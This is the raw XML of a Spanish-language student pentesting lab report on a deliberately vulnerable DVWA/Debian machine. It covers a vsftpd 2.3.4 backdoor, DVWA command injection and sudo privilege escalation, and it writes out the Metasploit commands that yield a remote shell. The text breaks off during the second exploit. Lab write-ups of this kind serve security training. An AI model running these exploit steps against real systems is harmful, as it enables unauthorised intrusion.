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2F7515" w14:textId="77777777" w:rsidR="006C7B6F" w:rsidRDefault="006C7B6F" w:rsidP="006C7B6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proyecto de Explotación en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> en un Sitio Web Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636E770" w14:textId="77777777" w:rsidR="006C7B6F" w:rsidRDefault="006C7B6F" w:rsidP="006C7B6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15876293" w14:textId="700079C1" w:rsidR="006C7B6F" w:rsidRPr="006C7B6F" w:rsidRDefault="006C7B6F" w:rsidP="006C7B6F">
      <w:r w:rsidRPr="006C7B6F">
        <w:t>Obtén la dirección IP de DVWA usando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7B6F">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7B6F">
        <w:t>. Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06487735" w14:textId="42487302" w:rsidR="00000000" w:rsidRDefault="00D77446">
      <w:r w:rsidRPr="00D77446">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7070FC66" wp14:editId="1241A9FE">
            <wp:extent cx="5612130" cy="3114040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="145485959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859596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8EFD5" w14:textId="77777777" w:rsidR="00D77446" w:rsidRDefault="00D77446"/>
    <w:p w14:paraId="765B5B64" w14:textId="57B94377" w:rsidR="00D77446" w:rsidRDefault="00D77446">
      <w:r w:rsidRPr="00D77446">
        <w:t>En tu máquina atacante (por ejemplo, Kali Linux), abre una terminal y ejecuta el siguiente comando para confirmar las vulnerabilidades, reemplazando &lt;IP-Target&gt; con la IP de la máquina DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50692D" w14:textId="72411EA4" w:rsidR="0046490E" w:rsidRDefault="0046490E">
      <w:r w:rsidRPr="0046490E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47417D9A" wp14:editId="5B6AAB12">
            <wp:extent cx="5449060" cy="1867161"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6598382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83820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19209" w14:textId="77777777" w:rsidR="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44ACB2C7" w14:textId="77777777" w:rsidR="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A6A45A" w14:textId="77777777" w:rsidR="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D5DDDC" w14:textId="77777777" w:rsidR="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B646DF9" w14:textId="77777777" w:rsidR="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F5CC5A" w14:textId="27CBDF71" w:rsidR="0046490E" w:rsidRPr="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotar vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BBB34" w14:textId="1717C5A7" w:rsidR="0046490E" w:rsidRDefault="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo: Explotar una vulnerabilidad en el servicio FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397797CE" w14:textId="11927CDD" w:rsidR="0046490E" w:rsidRDefault="00010385">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EAE141C" wp14:editId="18A0EB61">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>219075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="349463049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463049" name="Picture 1" descr="A screen shot of a computer scree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B574A81" w14:textId="49538E18" w:rsidR="00010385" w:rsidRDefault="00010385">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="354A592D" wp14:editId="3DF40D0C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3519805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5582285" cy="3857625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2116253321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253321" name="Picture 1" descr="A screen shot of a computer scree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28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6490E" w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo: Explotar una vulnerabilidad de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0046490E" w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0046490E" w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0046490E" w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0046490E" w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> en DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F97BF60" w14:textId="77777777" w:rsidR="0046490E" w:rsidRDefault="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F241F1C" w14:textId="77777777" w:rsidR="0046490E" w:rsidRPr="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046490E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Escalar privilegios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA518F" w14:textId="77777777" w:rsidR="0046490E" w:rsidRPr="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046490E">
        <w:t> Identifica técnicas de escalación de privilegios en la máquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7B35D" w14:textId="77777777" w:rsidR="0046490E" w:rsidRPr="0046490E" w:rsidRDefault="0046490E" w:rsidP="0046490E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046490E">
        <w:t xml:space="preserve"> Usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046490E">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046490E">
        <w:t xml:space="preserve"> locales o técnicas manuales para escalar privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78E036" w14:textId="55E802D8" w:rsidR="0046490E" w:rsidRDefault="00010385">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo: Escalación de privilegios usando una vulnerabilidad de sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AEC52B" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DF123F" w14:textId="1C9466F9" w:rsidR="00010385" w:rsidRDefault="00010385">
      <w:r w:rsidRPr="00010385">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="043F2F29" wp14:editId="482700C7">
            <wp:extent cx="5612130" cy="549275"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="394141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1414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5996E" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00010385"/>
    <w:p w14:paraId="2F960251" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00010385"/>
    <w:p w14:paraId="28E3B086" w14:textId="6F2274E8" w:rsidR="00010385" w:rsidRPr="00010385" w:rsidRDefault="00010385" w:rsidP="00010385">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Reporte de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04BDAF" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00010385"/>
    <w:p w14:paraId="36ED9201" w14:textId="328754E9" w:rsidR="00010385" w:rsidRPr="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53070961" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFF9FFC" w14:textId="419C37DD" w:rsidR="00010385" w:rsidRPr="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo y Alcance del Ejercicio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA966E8" w14:textId="101B6E04" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Este reporte documenta el proceso de identificación y explotación de vulnerabilidades en los servicios FTP y DVWA de una máquina objetivo con Debian, así como la escalación de privilegios local en el sistema. El objetivo principal es evaluar la seguridad y demostrar los riesgos asociados con las configuraciones inseguras y las aplicaciones desactualizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD9C63" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D51B72C" w14:textId="7C2E557F" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Metodología</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED059F" w14:textId="3F1159EB" w:rsidR="00010385" w:rsidRPr="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Herramientas y Técnicas Utilizadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FDA1AC" w14:textId="6C75B9D4" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Herramientas:Se</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> emplearon las siguientes herramientas para la detección y explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F71A7D" w14:textId="21E7FC76" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Framework: Para ejecutar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> conocidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C00D65" w14:textId="2D89F11E" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Comandos Linux: `sudo`, `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`, etc., para escalación de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E426928" w14:textId="1892D0EA" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Técnicas: Se aplicaron métodos de explotación de backdoor en servicios desactualizados y de inyección de comandos en aplicaciones web vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063FB1E1" w14:textId="77777777" w:rsidR="00DF40F5" w:rsidRDefault="00DF40F5" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0C8A6C" w14:textId="77777777" w:rsidR="00DF40F5" w:rsidRDefault="00DF40F5" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C29A80" w14:textId="77777777" w:rsidR="00DF40F5" w:rsidRDefault="00DF40F5" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108CD614" w14:textId="36EA05F8" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A99A5D" w14:textId="74CDF96E" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidad 1: Servicio FTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93C0B9" w14:textId="71E18CDD" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Descripción: Se identificó una versión desactualizada de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (2.3.4) que contiene una puerta trasera que permite acceso remoto con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01553202" w14:textId="7D1995D9" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proceso de Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C1E11" w14:textId="08256922" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 1. Se lanzó </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y se configuró el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> correspondiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A271CE1" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="298BB9FC" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AAEA4" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        set RHOST &lt;IP-Target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B085D5" w14:textId="267AED52" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B1EAF" w14:textId="0A38A9E8" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. La explotación fue exitosa, obteniendo acceso al sistema mediante un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD147D" w14:textId="0F37DCC2" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Evidencia: Captura de pantalla del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obtenido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397D19B" w14:textId="2E265281" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Vulnerabilidad 2: Inyección de Comandos en DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02510B1E" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A242F46" w14:textId="57CCF94E" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidR="00DF40F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">En la aplicación DVWA se detectó una vulnerabilidad de inyección de comandos, </w:t>
      </w:r>
      <w:r w:rsidR="00DF40F5">
        <w:t>lo cual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> permite ejecutar comandos arbitrarios en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936852B" w14:textId="2046F46F" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proceso de Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9FB364" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     1. Configuración y ejecución del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> desde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE1611" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
